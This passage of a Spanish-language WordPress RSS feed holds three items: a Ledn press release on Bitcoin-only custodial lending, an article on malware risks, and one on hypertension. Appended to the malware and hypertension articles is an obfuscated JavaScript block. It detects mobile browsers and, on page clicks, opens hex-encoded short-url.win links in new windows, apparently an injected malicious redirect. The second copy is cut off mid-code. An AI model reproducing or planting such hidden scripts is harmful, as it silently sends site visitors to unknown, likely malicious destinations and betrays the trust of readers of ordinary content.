<p>Ledn, uno de los prestamistas de activos digitales con mayor trayectoria, anunció hoy una actualización integral de su plataforma para suspender el préstamo de activos de clientes para generar intereses. Esto significa que los activos de los clientes nunca estarán expuestos al riesgo crediticio de terceros. De ahora en adelante, Ledn solo ofrecerá su estructura de préstamos de Bitcoin con custodia, bajo la cual la garantía de Bitcoin de los clientes permanecerá completamente bajo custodia, ya sea con Ledn o con sus socios financieros de confianza. Como parte de este cambio estratégico, Ledn también eliminará la compatibilidad con ETH, apostando por Bitcoin como su único activo digital. La compañía presentó estos cambios en Bitcoin 2025 en Las Vegas.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>“Con nuestro nuevo enfoque en préstamos exclusivamente en Bitcoin, volvemos a nuestras raíces y principios que inspiraron a Bitcoin en sus inicios”, declaró Adam Reeds, cofundador y director ejecutivo de Ledn. “Bitcoin se creó como respuesta directa a los riesgos de la banca de reserva fraccionaria y al uso descontrolado de los activos de los clientes para generar intereses. Las finanzas tradicionales se basan en la reutilización constante de los activos de los clientes para generar apalancamiento y, en última instancia, inflación. Los bitcoineros rechazan instintivamente ese modelo. Por eso nos hemos alejado por completo de este enfoque. Con nuestra estructura de préstamos custodiados, los activos de los clientes permanecen donde pertenecen y se mantienen de forma transparente”.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Si bien Ledn está tomando estas medidas para reducir aún más el riesgo de su producto y mejorar la seguridad de los clientes, muchos de los nuevos productos de préstamo en el mercado están exponiendo a los consumidores a estructuras riesgosas y opacas una vez más. “Estas son las mismas dinámicas que llevaron al colapso del sector crediticio en 2022”, añadió Reeds. "A medida que más nuevos participantes vuelven a introducir en el mercado modelos de préstamo poco elaborados, nosotros optamos por el camino opuesto: eliminar por completo el riesgo crediticio para nuestros usuarios y dejar totalmente claro cómo se gestionan sus activos. Esta claridad nos ha ayudado a generar más de 9.500 millones de dólares en préstamos y a convertirnos en el prestamista minorista CeFi número uno en el sector de Bitcoin. Creemos que este enfoque debería convertirse en el nuevo estándar para cualquier prestamista serio de activos digitales".</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Este cambio refuerza la estrategia general de Ledn: apostar por Bitcoin, simplificar su cartera de productos y centrarse en el activo digital más seguro y probado.<br><br>Ledn fue el primer prestamista de criptomonedas en introducir certificaciones de prueba de reservas en 2020, ofreciendo a los clientes verificación externa de que los activos estaban completamente contabilizados hasta el satoshi. Este enfoque de transparencia permitió a la empresa sortear la volatilidad del mercado mientras sus competidores se desplomaban bajo riesgos opacos y ocultos.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Ahora que los reguladores globales comienzan a mostrar una mayor apertura a la participación supervisada en lugar de restricciones generalizadas, la oportunidad —y la responsabilidad— de las plataformas de activos digitales es evidente: construir sistemas resilientes y mitigar el riesgo de forma proactiva.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Ledn ofrecerá exclusivamente préstamos custodiados respaldados por bitcoin a partir del 1 de julio de 2025. El soporte para ETH se retirará en la misma versión, lo que refleja la transición estratégica de Ledn hacia una plataforma exclusivamente para Bitcoin.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Mas info: blog.ledn.io</p>
<!-- /wp:paragraph -->
<p><a href="https://www.todoenunclick.com/ledn-adopta-un-modelo-de-prestamos-exclusivo-en-bitcoin-con-custodia-total-eliminando-el-riesgo-para-sus-clientes/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">100573</post-id>	</item>
		<item>
		<title>Peligros de la era digital</title>
		<link>https://www.todoenunclick.com/peligros-de-la-era-digital/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Mon, 22 Apr 2019 21:35:21 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[era digital]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[opinión]]></category>
		<category><![CDATA[peligros]]></category>
		<category><![CDATA[Riesgo]]></category>
		<category><![CDATA[seguridad]]></category>
		<category><![CDATA[spyware]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=87853</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2019/04/apertura-YIFI-pirateria.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2019/04/apertura-YIFI-pirateria.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2019/04/apertura-YIFI-pirateria.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2019/04/apertura-YIFI-pirateria.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2019/04/apertura-YIFI-pirateria.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2019/04/apertura-YIFI-pirateria.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2019/04/apertura-YIFI-pirateria.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2019/04/apertura-YIFI-pirateria.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 950px) 100vw, 950px" /></p>Un software malicioso o malware (término proveniente del concepto inglés malicious software, adoptado en 1990 por Yisrael Radai, pionero en la investigación de virus informáticos), es un tipo de programa que busca infiltrarse en un dispositivo para generar algún tipo de daño al equipo del usuario. Roba datos, bloquea sistemas, evita el acceso a los ordenadores o ejerce alguna otra acción, cada vez más diversas.

De acuerdo con la compañía de seguridad informática Kaspersky Lab, los cinco métodos más comunes de propagación son:
<ul>
 	<li><strong>Internet:</strong> Puede infiltrarse en el equipo cuando visitas un sitio web que contenga un código malicioso. Un caso común en los últimos años son los ataques drive-by (cuando un usuario visita un sitio web comprometido desde un dispositivo Android y su navegador comienza a descargar una aplicación de forma automática). También se transmite cuando se descargan aplicaciones malignas que se disfrazan como software normal o archivos mediante una red descentralizada (por ejemplo, a través de un cliente de torrent).</li>
</ul>
<ul>
 	<li><strong>Email: </strong>El malware puede estar en el cuerpo del mensaje o en el archivo adjunto. Al abrir estos correos o descargar el archivo, se ejecuta la infección del equipo. Además, es la fuente de entrada de phishing (mensajes que buscan engañar a los usuarios y conseguir que revelen información personal, como contraseñas y datos bancarios) o spam.</li>
</ul>
<ul>
 	<li><strong>Vulnerabilidades de software:</strong> también llamadas "huecos" o "exploits", facilitan el acceso al equipo de forma remota, lo que permite al ciberdelincuente gestionar tus datos, los recursos de red local y otras fuentes de información.</li>
</ul>
<ul>
 	<li><strong>Memorias USB, CDs, tarjetas SD:</strong> el malware puede alojarse en este tipo de dispositivos físicos en carpetas de red. Al ejecutarse algún archivo malicioso ubicado en un medio extraíble, es capaz de distribuir virus por todas las unidades de un equipo e incluso borrar los datos guardados en ellas.</li>
</ul>
<ul>
 	<li><strong>Los mismos usuarios: </strong>En ocasiones nosotros mismos u otros usuarios pueden instalar aplicaciones que parecen seguras pero en realidad infectan los datos. Este método se denomina “ingeniería social”, ya que los creadores de virus logran que la víctima aloje el virus por su propia cuenta.</li>
</ul>
Entre los tipos de malware más comunes te puedes topar con el adware que inserta anuncios no deseados para que el autor del mismo obtenga una ganancia; spyware, es un software espía cuya función es recopilar tus datos y movimientos sin que te des cuenta; su principal riesgo es la invasión a la privacidad, sin embargo, se caracteriza por disminuir el rendimiento y estabilidad del equipo debido a que se ejecuta utilizando componentes cruciales como la memoria RAM. El más popular, el virus se adjunta a archivos ejecutables, requiere la activación del usuario y su peligrosidad es tal que llega a modificar o borrar datos del dispositivo; el troyano se presenta como un programa aparentemente legítimo e inofensivo y puede esconderse en archivos no ejecutables como imágenes o audios, su misión es que el atacante tenga acceso remoto al equipo infectado; y por último, el gusano, se destaca por replicarse mediante la explotación independiente de errores de configuración en las redes, una vez infectado un servidor, se propaga velozmente y puede provocar grandes niveles de destrucción.

Datos revelados durante la 7ª Cúpula Latino Americana de Analistas de Seguridad de Kaspersky Lab en el 2017, afirmaron que los internautas latinoamericanos reciben, en promedio, más de 30 ciberataques por segundo. Los números de Kaspersky también revelaron que los internautas brasileños, mexicanos y colombianos sufrieron el mayor número de ataques de malware hasta en ese año, seguidos de Honduras (23,5%), Panamá (22,6%) y Guatemala (21,6%). El estudio también menciona un informe de Software Business Alliance, que afirma que más de la mitad (55%) de los programas y licencias usados ??en América Latina actualmente son ilegales.

Mientras más avanza la tecnología, es más común adoptarla en acciones de la vida diaria como puede ser el comercio en línea, ya sea para comprar algún producto o pagar un servicio de manera sencilla y sin que consuma mucho tiempo. Para evitar ser presa de alguno de estos malwares al comprar en línea, es importante acceder a sitios seguros y aún más importante, contar con un método de pago confiable que no comparta tus datos personales y bancarios. Una opción es PayPal, que juega un papel de intermediario entre los comercios y el consumidor con la finalidad de proteger la información (por ejemplo, número de tarjeta de crédito/débito o de la cuenta bancaria). Ya sea a través de su sitio web o de su aplicación (app) gratuita para smartphones y tablets, esta plataforma brinda una experiencia amigable resguardada bajo sólidos sistemas de seguridad.

&nbsp;
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/peligros-de-la-era-digital/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">87853</post-id>	</item>
		<item>
		<title>Hipertensión: un factor de riesgo cardiovascular en ascenso</title>
		<link>https://www.todoenunclick.com/hipertension-factor-riesgo-cardiovascular-ascenso/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Tue, 17 May 2016 12:24:21 +0000</pubDate>
				<category><![CDATA[Clickeando]]></category>
		<category><![CDATA[hipertensión]]></category>
		<category><![CDATA[opinión]]></category>
		<category><![CDATA[Riesgo]]></category>
		<guid isPermaLink="false">http://www.todoenunclick.com/?p=80828</guid>

					<description><![CDATA[<p><img width="642" height="335" src="https://www.todoenunclick.com/wp-content/uploads/2016/05/hipertension.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2016/05/hipertension.jpg?w=642&amp;ssl=1 642w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2016/05/hipertension.jpg?resize=640%2C335&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2016/05/hipertension.jpg?resize=306%2C160&amp;ssl=1 306w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2016/05/hipertension.jpg?resize=600%2C313&amp;ssl=1 600w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2016/05/hipertension.jpg?resize=500%2C261&amp;ssl=1 500w" sizes="auto, (max-width: 642px) 100vw, 642px" /></p>Con motivo del Día Mundial de la Hipertensión, que se conmemora el 17 de mayo, desde la Fundación Cardiológica Argentina adherimos a la fecha difundiendo un mensaje de concientización acerca de esta enfermedad tan frecuente en la actualidad.

Se estima que la hipertensión afecta al 35% de la población latinoamericana, siendo aún más preocupante el panorama si se tiene que en cuenta que su prevalencia aumenta con la edad. Asimismo, no hay que perder de vista que cuando se diagnostica tiene un control deficiente ya que solo lo hace el 25/30% de los pacientes hipertensos, y se calcula que la adhesión al tratamiento es del 20/30%.

<strong>¿Cuál es su impacto en el organismo?</strong>

La hipertensión arterial es la presión que ejerce la sangre sobre las arterias de diversos órganos del cuerpo. Por lo tanto, padecer esta patología aumenta proporcionalmente la incidencia de distintas enfermedades como el accidente cerebrovascular, el infarto agudo de miocardio, la insuficiencia cardíaca, la muerte súbita y cardiovascular. Es decir, es un factor de riesgo cardiovascular ya que aumenta la probabilidad de padecerlas.

De todos modos, es importante saber que el correcto control de los valores de la presión arterial se refleja en una menor incidencia y prevalencia de las enfermedades que genera este potente factor de riesgo.

En los últimos años, no ha habido novedades trascendentes en relación a nuevos tratamientos o fármacos. Pero, sí se visualizó que la terapéutica con medicamentos combinados con dosis bajas en un solo comprimido es una muy buena alternativa ya que mejora el cumplimiento terapéutico y hace que disminuya la toma de píldoras diarias. En general, estos pacientes se encuentran polimedicados porque padecen otros factores de riesgo coronarios como diabetes, dislipemia, entre otros.

<strong>Recomendaciones para actuar a tiempo</strong>

Es importante tener en cuenta que la única manera de detectar la hipertensión en sus inicios es con revisiones periódicas. Recurrir al médico para realizar chequeos anuales permite diagnosticar la enfermedad y llevar adelante un correcto tratamiento.

También, es fundamental mantener un peso adecuado, hacer actividad física y no abusar del consumo diario de sal. En la mayoría de los casos la hipertensión no puede curarse, pero sí controlarse. Por eso, en general debe seguirse un tratamiento regular de por vida en donde la medicación es sólo una parte del mismo. Llevar adelante un estilo de vida que involucre el cambio de ciertos hábitos por otros más saludables se vuelve imprescindible para tener más y mejor salud.
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v 